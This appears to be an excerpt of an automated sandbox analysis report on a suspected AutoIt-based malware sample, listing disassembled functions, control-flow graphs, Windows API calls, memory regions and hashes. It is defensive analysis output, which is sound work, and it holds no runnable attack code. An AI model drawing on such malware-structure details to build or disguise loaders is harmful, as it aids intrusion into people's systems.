                                                                                                                  control_flow_graph 302 af065b-af068b call af042f 305 af068d-af0698 call adf2c6 302->305 306 af06a6-af06b2 call ae5221 302->306 311 af069a-af06a1 call adf2d9 305->311 312 af06cb-af0714 call af039a 306->312 313 af06b4-af06c9 call adf2c6 call adf2d9 306->313 323 af097d-af0983 311->323 321 af0716-af071f 312->321 322 af0781-af078a GetFileType 312->322 313->311 325 af0756-af077c GetLastError call adf2a3 321->325 326 af0721-af0725 321->326 327 af078c-af07bd GetLastError call adf2a3 CloseHandle 322->327 328 af07d3-af07d6 322->328 325->311 326->325 332 af0727-af0754 call af039a 326->332 327->311 339 af07c3-af07ce call adf2d9 327->339 330 af07df-af07e5 328->330 331 af07d8-af07dd 328->331 335 af07e9-af0837 call ae516a 330->335 336 af07e7 330->336 331->335 332->322 332->325 345 af0839-af0845 call af05ab 335->345 346 af0847-af086b call af014d 335->346 336->335 339->311 345->346 353 af086f-af0879 call ae86ae 345->353 351 af087e-af08c1 346->351 352 af086d 346->352 355 af08c3-af08c7 351->355 356 af08e2-af08f0 351->356 352->353 353->323 355->356 358 af08c9-af08dd 355->358 359 af097b 356->359 360 af08f6-af08fa 356->360 358->356 359->323 360->359 361 af08fc-af092f CloseHandle call af039a 360->361 364 af0963-af0977 361->364 365 af0931-af095d GetLastError call adf2a3 call ae5333 361->365 364->359 365->364
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AF039A: CreateFileW.KERNELBASE(00000000,00000000,?,00AF0704,?,?,00000000,?,00AF0704,00000000,0000000C), ref: 00AF03B7
                                                                                                                  • GetLastError.KERNEL32 ref: 00AF076F
                                                                                                                  • __dosmaperr.LIBCMT ref: 00AF0776
                                                                                                                  • GetFileType.KERNELBASE(00000000), ref: 00AF0782
                                                                                                                  • GetLastError.KERNEL32 ref: 00AF078C
                                                                                                                  • __dosmaperr.LIBCMT ref: 00AF0795
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AF07B5
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00AF08FF
                                                                                                                  • GetLastError.KERNEL32 ref: 00AF0931
                                                                                                                  • __dosmaperr.LIBCMT ref: 00AF0938
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                  • String ID: H
                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                  • Opcode ID: 1782616288ecd6b560729be7187aa1e1c0fed6f2b4036d74af3e975433d7ff12
                                                                                                                  • Instruction ID: 445e93f932dda3c5729808a8cc8a1ba553a28363c77103828e0822ce22abbdd6
                                                                                                                  • Opcode Fuzzy Hash: 1782616288ecd6b560729be7187aa1e1c0fed6f2b4036d74af3e975433d7ff12
                                                                                                                  • Instruction Fuzzy Hash: 51A12736A101088FDF19AFA8D851BBE7BA0AF06320F144159F916DF3A2DB359D12CB91
                                                                                                                  Function 00AB344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B81418,?,00AB2E7F,?,?,?,00000000), ref: 00AB3A78
                                                                                                                    • Part of subcall function 00AB3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AB3379
                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AB356A
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AF318D
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AF31CE
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AF3210
                                                                                                                  • _wcslen.LIBCMT ref: 00AF3277
                                                                                                                  • _wcslen.LIBCMT ref: 00AF3286
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                  • API String ID: 98802146-2727554177
                                                                                                                  • Opcode ID: 47590424372325082d5b0b21f8f058b565d361c1342ed75f840f839823cd9616
                                                                                                                  • Instruction ID: 1bacc9b9cf3357b88c8e26361eb4cbc00392f17905dd5b1524b94127dae455bc
                                                                                                                  • Opcode Fuzzy Hash: 47590424372325082d5b0b21f8f058b565d361c1342ed75f840f839823cd9616
                                                                                                                  • Instruction Fuzzy Hash: 4071B0724053049EC714EF69ED929ABBBE8FF99740F40092EF54583271EF349A48CB56
                                                                                                                  Function 00AB2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00AB2B8E
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00AB2B9D
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00AB2BB3
                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00AB2BC5
                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00AB2BD7
                                                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AB2BEF
                                                                                                                  • RegisterClassExW.USER32(?), ref: 00AB2C40
                                                                                                                    • Part of subcall function 00AB2CD4: GetSysColorBrush.USER32(0000000F), ref: 00AB2D07
                                                                                                                    • Part of subcall function 00AB2CD4: RegisterClassExW.USER32(00000030), ref: 00AB2D31
                                                                                                                    • Part of subcall function 00AB2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB2D42
                                                                                                                    • Part of subcall function 00AB2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00AB2D5F
                                                                                                                    • Part of subcall function 00AB2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AB2D6F
                                                                                                                    • Part of subcall function 00AB2CD4: LoadIconW.USER32(000000A9), ref: 00AB2D85
                                                                                                                    • Part of subcall function 00AB2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AB2D94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                  • API String ID: 423443420-4155596026
                                                                                                                  • Opcode ID: 03509d16b3615fd8465caf10f5990e6b1e2eb75aade16404c6cfb281ac4a7a33
                                                                                                                  • Instruction ID: 9eee59bfc91cc671d8ddb0131c9c36ed0f3284e80839894a8fcbd7e435a12689
                                                                                                                  • Opcode Fuzzy Hash: 03509d16b3615fd8465caf10f5990e6b1e2eb75aade16404c6cfb281ac4a7a33
                                                                                                                  • Instruction Fuzzy Hash: C9211875E02318BBDB10DFA9EC55AA97FB8FB48B50F00041AE500A76B0DBB14A51CF98
                                                                                                                  Function 00AB3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 443 ab3170-ab3185 444 ab3187-ab318a 443->444 445 ab31e5-ab31e7 443->445 446 ab31eb 444->446 447 ab318c-ab3193 444->447 445->444 448 ab31e9 445->448 452 af2dfb-af2e23 call ab18e2 call ace499 446->452 453 ab31f1-ab31f6 446->453 449 ab3199-ab319e 447->449 450 ab3265-ab326d PostQuitMessage 447->450 451 ab31d0-ab31d8 DefWindowProcW 448->451 455 af2e7c-af2e90 call b1bf30 449->455 456 ab31a4-ab31a8 449->456 458 ab3219-ab321b 450->458 457 ab31de-ab31e4 451->457 487 af2e28-af2e2f 452->487 459 ab31f8-ab31fb 453->459 460 ab321d-ab3244 SetTimer RegisterWindowMessageW 453->460 455->458 481 af2e96 455->481 462 ab31ae-ab31b3 456->462 463 af2e68-af2e72 call b1c161 456->463 458->457 466 af2d9c-af2d9f 459->466 467 ab3201-ab3214 KillTimer call ab30f2 call ab3c50 459->467 460->458 464 ab3246-ab3251 CreatePopupMenu 460->464 470 af2e4d-af2e54 462->470 471 ab31b9-ab31be 462->471 477 af2e77 463->477 464->458 473 af2dd7-af2df6 MoveWindow 466->473 474 af2da1-af2da5 466->474 467->458 470->451 484 af2e5a-af2e63 call b10ad7 470->484 479 ab3253-ab3263 call ab326f 471->479 480 ab31c4-ab31ca 471->480 473->458 482 af2da7-af2daa 474->482 483 af2dc6-af2dd2 SetFocus 474->483 477->458 479->458 480->451 480->487 481->451 482->480 488 af2db0-af2dc1 call ab18e2 482->488 483->458 484->451 487->451 492 af2e35-af2e48 call ab30f2 call ab3837 487->492 488->458 492->451
                                                                                                                  APIs
                                                                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00AB316A,?,?), ref: 00AB31D8
                                                                                                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,00AB316A,?,?), ref: 00AB3204
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AB3227
                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00AB316A,?,?), ref: 00AB3232
                                                                                                                  • CreatePopupMenu.USER32 ref: 00AB3246
                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00AB3267
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                  • String ID: TaskbarCreated
                                                                                                                  • API String ID: 129472671-2362178303
                                                                                                                  • Opcode ID: b1e8bf0a314d6e42d2556ac1f841c22946406974dc8856bf3e7c4e0d137ad67d
                                                                                                                  • Instruction ID: 71e116172ca3ab241165926d6cd481993272f7b458a9ee651a90fc0a95bd3dbe
                                                                                                                  • Opcode Fuzzy Hash: b1e8bf0a314d6e42d2556ac1f841c22946406974dc8856bf3e7c4e0d137ad67d
                                                                                                                  • Instruction Fuzzy Hash: CB41D437241208A7DF146BACDD1ABF93A6DEB15340F040655F601862B3CF718E42E765
                                                                                                                  Function 00AE8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 499 ae8d45-ae8d55 500 ae8d6f-ae8d71 499->500 501 ae8d57-ae8d6a call adf2c6 call adf2d9 499->501 503 ae90d9-ae90e6 call adf2c6 call adf2d9 500->503 504 ae8d77-ae8d7d 500->504 518 ae90f1 501->518 520 ae90ec call ae27ec 503->520 504->503 505 ae8d83-ae8dae 504->505 505->503 508 ae8db4-ae8dbd 505->508 511 ae8dbf-ae8dd2 call adf2c6 call adf2d9 508->511 512 ae8dd7-ae8dd9 508->512 511->520 516 ae8ddf-ae8de3 512->516 517 ae90d5-ae90d7 512->517 516->517 523 ae8de9-ae8ded 516->523 521 ae90f4-ae90f9 517->521 518->521 520->518 523->511 526 ae8def-ae8e06 523->526 528 ae8e08-ae8e0b 526->528 529 ae8e23-ae8e2c 526->529 530 ae8e0d-ae8e13 528->530 531 ae8e15-ae8e1e 528->531 532 ae8e2e-ae8e45 call adf2c6 call adf2d9 call ae27ec 529->532 533 ae8e4a-ae8e54 529->533 530->531 530->532 537 ae8ebf-ae8ed9 531->537 562 ae900c 532->562 535 ae8e5b-ae8e79 call ae3820 call ae29c8 * 2 533->535 536 ae8e56-ae8e58 533->536 572 ae8e7b-ae8e91 call adf2d9 call adf2c6 535->572 573 ae8e96-ae8ebc call ae9424 535->573 536->535 539 ae8edf-ae8eef 537->539 540 ae8fad-ae8fb6 call aef89b 537->540 539->540 544 ae8ef5-ae8ef7 539->544 551 ae8fb8-ae8fca 540->551 552 ae9029 540->552 544->540 548 ae8efd-ae8f23 544->548 548->540 553 ae8f29-ae8f3c 548->553 551->552 557 ae8fcc-ae8fdb GetConsoleMode 551->557 555 ae902d-ae9045 ReadFile 552->555 553->540 558 ae8f3e-ae8f40 553->558 560 ae9047-ae904d 555->560 561 ae90a1-ae90ac GetLastError 555->561 557->552 563 ae8fdd-ae8fe1 557->563 558->540 564 ae8f42-ae8f6d 558->564 560->561 568 ae904f 560->568 566 ae90ae-ae90c0 call adf2d9 call adf2c6 561->566 567 ae90c5-ae90c8 561->567 570 ae900f-ae9019 call ae29c8 562->570 563->555 569 ae8fe3-ae8ffd ReadConsoleW 563->569 564->540 571 ae8f6f-ae8f82 564->571 566->562 580 ae90ce-ae90d0 567->580 581 ae9005-ae900b call adf2a3 567->581 576 ae9052-ae9064 568->576 578 ae901e-ae9027 569->578 579 ae8fff GetLastError 569->579 570->521 571->540 583 ae8f84-ae8f86 571->583 572->562 573->537 576->570 587 ae9066-ae906a 576->587 578->576 579->581 580->570 581->562 583->540 584 ae8f88-ae8fa8 583->584 584->540 593 ae906c-ae907c call ae8a61 587->593 594 ae9083-ae908e 587->594 605 ae907f-ae9081 593->605 599 ae909a-ae909f call ae88a1 594->599 600 ae9090 call ae8bb1 594->600 606 ae9095-ae9098 599->606 600->606 605->570 606->605
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a8d656d5dbd9d472ec0c505232867f66f586808164052275b509949b69a5558c
                                                                                                                  • Instruction ID: 217950d0a25a1e5a64facdce853bc66541b5c70cfd356a5078a0252d04befc57
                                                                                                                  • Opcode Fuzzy Hash: a8d656d5dbd9d472ec0c505232867f66f586808164052275b509949b69a5558c
                                                                                                                  • Instruction Fuzzy Hash: 1EC1F374904389AFDF11EFAAC841BEEBBB4BF19310F444199F519AB392CB349941CB61
                                                                                                                  Function 0180C3C8 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 607 180c3c8-180c41a call 180c2c8 CreateFileW 610 180c423-180c430 607->610 611 180c41c-180c41e 607->611 614 180c432-180c43e 610->614 615 180c443-180c45a VirtualAlloc 610->615 612 180c57c-180c580 611->612 614->612 616 180c463-180c489 CreateFileW 615->616 617 180c45c-180c45e 615->617 619 180c48b-180c4a8 616->619 620 180c4ad-180c4c7 ReadFile 616->620 617->612 619->612 621 180c4c9-180c4e6 620->621 622 180c4eb-180c4ef 620->622 621->612 623 180c510-180c527 WriteFile 622->623 624 180c4f1-180c50e 622->624 626 180c552-180c577 CloseHandle VirtualFree 623->626 627 180c529-180c550 623->627 624->612 626->612 627->612
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0180C40D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                  • Instruction ID: 1a18d5b6c8f6bf833df4ba3dc9e955f00acf9198a66b8cdca37b6d189ac39a90
                                                                                                                  • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                  • Instruction Fuzzy Hash: 5651D875A50208BBEB60DFA4CC89FEE7778BF48701F108654F61AEA1C0DB75A6448B64
                                                                                                                  Function 00AB2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 647 ab2c63-ab2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AB2C91
                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AB2CB2
                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00AB1CAD,?), ref: 00AB2CC6
                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00AB1CAD,?), ref: 00AB2CCF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CreateShow
                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                  • Opcode ID: 54957b523708663c4f85e368ef9ece89839c2278b987d7f64118f4b9230a536b
                                                                                                                  • Instruction ID: 606a9cf46ace14d44af5da78bac1fb655fac20bf4e7db6d2ab844fabd0db7b5f
                                                                                                                  • Opcode Fuzzy Hash: 54957b523708663c4f85e368ef9ece89839c2278b987d7f64118f4b9230a536b
                                                                                                                  • Instruction Fuzzy Hash: CAF0DA755423907AEB711B1BAC08EB72EBDE7C7F50B00045AF904A35B0CA755852DBB9
                                                                                                                  Function 00B22947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B22C05
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00B22C87
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B22C9D
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B22CAE
                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B22CC0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Delete$Copy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3226157194-0
                                                                                                                  • Opcode ID: bfbc2aa941a9e873a19780bf12ff833740ef84f4b8b9ade18a02de3ca82d998d
                                                                                                                  • Instruction ID: 320846755b1f7f07ac7ebcdf932417157cf42930ce2c33b445d0729a460c66d9
                                                                                                                  • Opcode Fuzzy Hash: bfbc2aa941a9e873a19780bf12ff833740ef84f4b8b9ade18a02de3ca82d998d
                                                                                                                  • Instruction Fuzzy Hash: 8DB15F71D00129ABDF21EFA4DD85EEEBBBDEF49350F1040A6F509E7251EA309A448F61
                                                                                                                  Function 0180DE68 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 868 180de68-180dfae call 180baa8 call 180dd58 CreateFileW 875 180dfb0 868->875 876 180dfb5-180dfc5 868->876 877 180e082-180e087 875->877 879 180dfc7 876->879 880 180dfcc-180dfe6 VirtualAlloc 876->880 879->877 881 180dfe8 880->881 882 180dfed-180e004 ReadFile 880->882 881->877 883 180e006 882->883 884 180e008-180e01d call 180cb18 882->884 883->877 886 180e022-180e05c call 180dd98 call 180cd58 884->886 891 180e078-180e080 886->891 892 180e05e-180e073 call 180dde8 886->892 891->877 892->891
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0180DD58: Sleep.KERNELBASE(000001F4), ref: 0180DD69
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0180DFA4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFileSleep
                                                                                                                  • String ID: PQKJ3SVGUPLLH56F
                                                                                                                  • API String ID: 2694422964-2817001817
                                                                                                                  • Opcode ID: 474a1a3ef0b78a243a3f22f839876c7055a42d0ffcedeafc37c44ac54e1feced
                                                                                                                  • Instruction ID: 38dec1243c20ddeb3164a1e81aa830787974776b79afdca4b57f759ec206827e
                                                                                                                  • Opcode Fuzzy Hash: 474a1a3ef0b78a243a3f22f839876c7055a42d0ffcedeafc37c44ac54e1feced
                                                                                                                  • Instruction Fuzzy Hash: 8D515F30D1424CDBEB12DBE4C854BEEBB79AF59300F004599E649BB2C0D7B91B45CBA6
                                                                                                                  Function 00AB3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 931 ab3b1c-ab3b27 932 ab3b99-ab3b9b 931->932 933 ab3b29-ab3b2e 931->933 935 ab3b8c-ab3b8f 932->935 933->932 934 ab3b30-ab3b48 RegOpenKeyExW 933->934 934->932 936 ab3b4a-ab3b69 RegQueryValueExW 934->936 937 ab3b6b-ab3b76 936->937 938 ab3b80-ab3b8b RegCloseKey 936->938 939 ab3b78-ab3b7a 937->939 940 ab3b90-ab3b97 937->940 938->935 941 ab3b7e 939->941 940->941 941->938
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AB3B0F,SwapMouseButtons,00000004,?), ref: 00AB3B40
                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AB3B0F,SwapMouseButtons,00000004,?), ref: 00AB3B61
                                                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00AB3B0F,SwapMouseButtons,00000004,?), ref: 00AB3B83
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
